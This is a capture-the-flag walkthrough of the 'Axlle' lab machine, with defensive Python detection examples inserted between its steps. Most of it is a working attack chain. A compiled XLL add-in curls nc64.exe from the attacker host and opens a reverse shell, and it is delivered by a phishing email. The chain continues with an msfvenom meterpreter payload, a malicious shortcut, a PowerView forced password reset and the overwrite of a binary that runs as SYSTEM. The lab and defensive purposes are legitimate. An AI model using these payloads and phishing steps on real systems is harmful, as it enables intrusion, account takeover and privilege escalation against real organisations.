User.txt
First we need to search for open ports on the machine:
sudo nmap -sV -p- -Pn -vv -T4 10.129.78.149
Output:
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack ttl 127 hMailServer smtpd
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-06-22 20:04:06Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: axlle.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
51187/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
53143/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
53144/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
57950/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
57965/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Let’s add axlle.htb to our /etc/hosts file (sudo is only needed on tee, since echo runs in our own shell):
echo "10.129.78.149 axlle.htb" | sudo tee -a /etc/hosts
On the website we can see this message:
Then we need to craft a phishing mail carrying a malicious Excel add-in (XLL) as the payload.
First, create the exploit.c file:
#include <windows.h>
#include <stdlib.h>
/* xlAutoOpen is the export Excel calls when it loads an XLL add-in */
__declspec(dllexport) short __stdcall xlAutoOpen()
{
    system("curl http://10.10.14.27:8081/nc64.exe -o c:\\Windows\\Tasks\\nc64.exe && C:\\Windows\\Tasks\\nc64.exe -e cmd 10.10.14.27 1337");
    return 0;
}
And create exploit.def, which declares the exported name:
LIBRARY mydll
EXPORTS
xlAutoOpen
Then compile it. An XLL is just a DLL saved with the .xll extension, and exploit.def is passed in so the export name matches:
x86_64-w64-mingw32-gcc -shared -o exploit.xll exploit.c exploit.def
Serve nc64.exe from your python3 web server and send the email with swaks:
swaks --to "accounts@axlle.htb" --from "lautaro@axlle.htb" --header "Subject: Exploit" --body "Exploit" --attach-type application/octet-stream --attach @exploit.xll --server axlle.htb --port 25 --timeout 20s
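From the defender's side, the delivery step above is where a mail gateway can stop this: the attachment is declared as application/octet-stream, but it is a PE image with a .xll name. The following is an added example (not from the original write-up) of a minimal attachment check in Python: it parses a message, and flags any attachment whose extension is an add-in/executable type or whose bytes carry an MZ/PE header regardless of the declared content type. The sample message and the fake PE header are constructed here for the demonstration.

```python
import email
from email import policy
from email.message import EmailMessage

# Extensions Excel/Windows will execute as native code when opened.
# An XLL add-in is just a DLL that exports xlAutoOpen.
EXECUTABLE_EXTENSIONS = {".xll", ".dll", ".exe", ".scr", ".com", ".pif"}


def is_pe_image(data: bytes) -> bool:
    """True if the bytes start with a DOS 'MZ' header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def flag_risky_attachments(raw_message: bytes) -> list[dict]:
    """Return one finding per attachment that is an executable by name or by content."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
        payload = part.get_payload(decode=True) or b""
        reasons = []
        if ext in EXECUTABLE_EXTENSIONS:
            reasons.append(f"blocked extension {ext}")
        if is_pe_image(payload):
            # Content check: catches an executable renamed to .pdf or similar.
            reasons.append("attachment is a PE executable (MZ/PE header)")
        if reasons:
            findings.append({
                "filename": name,
                "content_type": part.get_content_type(),
                "reasons": reasons,
            })
    return findings


def build_sample_message(attachment_name: str, payload: bytes) -> bytes:
    """Constructed sample shaped like the swaks send: octet-stream attachment to accounts@."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "accounts@axlle.htb"
    msg["Subject"] = "Exploit"
    msg.set_content("Exploit")
    msg.add_attachment(payload, maintype="application", subtype="octet-stream",
                       filename=attachment_name)
    return msg.as_bytes()


# Constructed minimal PE header, not a real binary: 'MZ', e_lfanew = 0x40, 'PE\0\0' at 0x40.
FAKE_PE = b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0" + b"\0" * 16

if __name__ == "__main__":
    for name, data in [("exploit.xll", FAKE_PE), ("invoice.pdf", FAKE_PE), ("report.pdf", b"%PDF-1.4\n")]:
        print(name, flag_risky_attachments(build_sample_message(name, data)))
```

The extension check alone would miss a renamed file, and the header check alone would miss a non-PE add-in format, so a gateway rule should combine both and quarantine rather than rely on the sender's declared MIME type.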
In your nc listener you will get the shell:
C:\Users\gideon.hamill\Desktop>whoami
whoami
axlle\gideon.hamill
C:\Users\gideon.hamill\Desktop>
On the box we can see this mail:
C:\Program Files (x86)\hMailServer\Data\axlle.htb\dallon.matrix\2F\{2F7523BD-628F-4359-913E-A873FCC59D0F}.eml
Content:
Hi everyone,
The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.
We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.
Yours in click-worthy URLs,
The Web Dev Team
Then we’ll craft a rev.exe with msfvenom and set up a listener with multi/handler.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=1338 -f exe > rev.exe
Then upload the shell with curl:
C:\ProgramData>curl http://10.10.14.27:8081/rev.exe -o C:\ProgramData\rev.exe
curl http://10.10.14.27:8081/rev.exe -o C:\ProgramData\rev.exe
And now we need to create a shortcut in the folder mentioned in the mail, from PowerShell:
powershell.exe
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\inetpub\testing\Notepad.url")
$lnk.TargetPath = "c:\programdata\rev.exe"
$lnk.Save()
PS C:\ProgramData> $objShell = New-Object -ComObject WScript.Shell
$objShell = New-Object -ComObject WScript.Shell
PS C:\ProgramData> $lnk = $objShell.CreateShortcut("C:\inetpub\testing\Notepad.url")
$lnk = $objShell.CreateShortcut("C:\inetpub\testing\Notepad.url")
PS C:\ProgramData> $lnk.TargetPath = "c:\programdata\rev.exe"
$lnk.TargetPath = "c:\programdata\rev.exe"
PS C:\ProgramData> $lnk.Save()
$lnk.Save()
PS C:\ProgramData>
Then we’ll receive a new Meterpreter session as dallon.matrix.
And get the flag:
C:\Users\dallon.matrix\Desktop>type user.txt
type user.txt
2745afe***********7185b14d93
C:\Users\dallon.matrix\Desktop>
Root.txt
With BloodHound we can see that our user has the right to change the password of the jacob.greeny user.
Let’s transfer PowerView.ps1 to the Windows machine:
curl http://10.10.14.27:8081/PowerView.ps1 -o C:\Users\dallon.matrix\Desktop\PowerView.ps1
And then import it:
Import-Module .\PowerView.ps1
Then reset the password:
$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity 'jacob.greeny' -AccountPassword $NewPassword
And we can now log in via evil-winrm as jacob.greeny:
evil-winrm -u jacob.greeny -p 'Password123!' -i axlle.htb
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents> whoami
axlle\jacob.greeny
*Evil-WinRM* PS C:\Users\jacob.greeny\Documents>
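The password reset above leaves a clear trail on the domain controller: a Security event 4724 ("An attempt was made to reset an account's password") whose subject is dallon.matrix rather than a helpdesk account, followed shortly by a network logon (4624) for jacob.greeny. The following is an added example in Python, not part of the original write-up, showing the two detections a SOC would want over such events: resets performed by an account outside an authorized set, and a reset followed by a logon of the target within a short window. The events, field names, the svc_helpdesk account and the timestamps are constructed for the demonstration; the field names follow the usual 4724/4624 layout but should be checked against your own SIEM's schema.

```python
from datetime import datetime, timedelta

# Accounts that legitimately reset passwords (hypothetical helpdesk service account).
AUTHORIZED_RESETTERS = {"AXLLE\\svc_helpdesk"}

# Constructed sample events in the shape a SIEM might emit for Security 4724 and 4624.
SAMPLE_EVENTS = [
    {"EventID": 4724, "TimeCreated": "2024-06-22T12:00:00", "SubjectDomainName": "AXLLE",
     "SubjectUserName": "svc_helpdesk", "TargetUserName": "alice.smith"},
    {"EventID": 4724, "TimeCreated": "2024-06-22T12:05:00", "SubjectDomainName": "AXLLE",
     "SubjectUserName": "dallon.matrix", "TargetUserName": "jacob.greeny"},
    {"EventID": 4624, "TimeCreated": "2024-06-22T12:06:30", "LogonType": 3,
     "TargetUserName": "jacob.greeny", "IpAddress": "10.10.14.27"},
    {"EventID": 4624, "TimeCreated": "2024-06-22T12:30:00", "LogonType": 2,
     "TargetUserName": "alice.smith", "IpAddress": "10.129.78.20"},
]


def find_unauthorized_resets(events, authorized=AUTHORIZED_RESETTERS) -> list[dict]:
    """Every 4724 whose subject (the account doing the reset) is not in the authorized set."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4724:
            continue
        actor = f"{ev['SubjectDomainName']}\\{ev['SubjectUserName']}"
        if actor not in authorized:
            hits.append({"time": ev["TimeCreated"], "actor": actor, "target": ev["TargetUserName"]})
    return hits


def correlate_reset_then_logon(events, window=timedelta(minutes=15)) -> list[dict]:
    """Pair each 4724 with the first 4624 for the same target account inside `window`.

    A reset immediately followed by a logon of the reset account is the classic
    "changed the password, then used it" pattern rather than a helpdesk ticket.
    """
    resets = [ev for ev in events if ev.get("EventID") == 4724]
    logons = [ev for ev in events if ev.get("EventID") == 4624]
    out = []
    for reset in resets:
        t0 = datetime.fromisoformat(reset["TimeCreated"])
        for logon in logons:
            t1 = datetime.fromisoformat(logon["TimeCreated"])
            same_account = logon["TargetUserName"].lower() == reset["TargetUserName"].lower()
            if same_account and t0 <= t1 <= t0 + window:
                out.append({
                    "target": reset["TargetUserName"],
                    "reset_by": reset["SubjectUserName"],
                    "logon_from": logon.get("IpAddress"),
                    "seconds_after_reset": int((t1 - t0).total_seconds()),
                })
                break
    return out


if __name__ == "__main__":
    print(find_unauthorized_resets(SAMPLE_EVENTS))
    print(correlate_reset_then_logon(SAMPLE_EVENTS))
```

The first rule is the one that would have caught this case on its own; the correlation is there because on a large domain the list of "who resets passwords" is rarely clean, and reset-then-logon within minutes is the stronger signal. The underlying fix is to review the ACL that gave dallon.matrix the reset right in the first place.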
Look at the README.md file in C:\App Development\kbfiltr:
C:\App Development\kbfiltr> type README.md
Note this line:
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
Then we just need to overwrite the standalonerunner.exe file with the rev.exe we uploaded some minutes ago.
Go to
C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\internal\x64
And fetch rev.exe with iwr, writing it over standalonerunner.exe:
iwr -uri http://10.10.14.27:8081/rev.exe -o standalonerunner.exe
Before doing this we need to exit our Meterpreter session and run exploit again in the handler, so it is waiting for the new connection.
Then:
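The root cause here is a binary that runs as SYSTEM from a directory a low-privilege user can write to, so the binary can be swapped. Two checks catch that: file-integrity monitoring against a known-good hash, and a writability check on anything scheduled to run with high privilege. The following is an added example in Python, not part of the original write-up, that implements both over a baseline map of path to SHA-256. The demonstration builds the "scheduled runner" in a temporary directory with constructed content and then simulates the overwrite; on a real host the baseline would come from a clean install and the check would run as the unprivileged user you are worried about.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Streamed SHA-256 so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_privileged_binaries(baseline: dict[str, str]) -> list[dict]:
    """Report drift from the baseline hash and any binary writable by the current (unprivileged) process.

    Run this as the low-privilege account: os.access reflects that account's
    effective permissions, which is exactly the question "could this user swap it".
    """
    findings = []
    for raw_path, expected in baseline.items():
        path = Path(raw_path)
        if not path.exists():
            findings.append({"path": raw_path, "issue": "missing"})
            continue
        actual = sha256_of(path)
        if actual != expected:
            findings.append({"path": raw_path, "issue": "hash mismatch",
                             "expected": expected, "actual": actual})
        if os.access(path, os.W_OK):
            findings.append({"path": raw_path, "issue": "writable by current user"})
    return findings


def build_demo() -> dict[str, str]:
    """Constructed scenario: baseline a stand-in runner, then overwrite it as the write-up does."""
    folder = Path(tempfile.mkdtemp(prefix="standalone_"))
    runner = folder / "standalonerunner.exe"
    runner.write_bytes(b"ORIGINAL-TEST-RUNNER")           # constructed stand-in, not a real PE
    baseline = {str(runner): sha256_of(runner)}
    runner.write_bytes(b"MZ-replaced-by-rev.exe")          # simulate the overwrite
    return baseline


if __name__ == "__main__":
    for finding in check_privileged_binaries(build_demo()):
        print(finding)
```

The hash mismatch tells you the swap already happened; the writability finding is the one to act on beforehand, by moving the runner to a location only administrators can write or tightening its DACL.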
C:\Users\Administrator\Desktop>type root.txt
type root.txt
5557d5************ae2070f2
C:\Users\Administrator\Desktop>
That is the last flag.
I hope you found it useful (: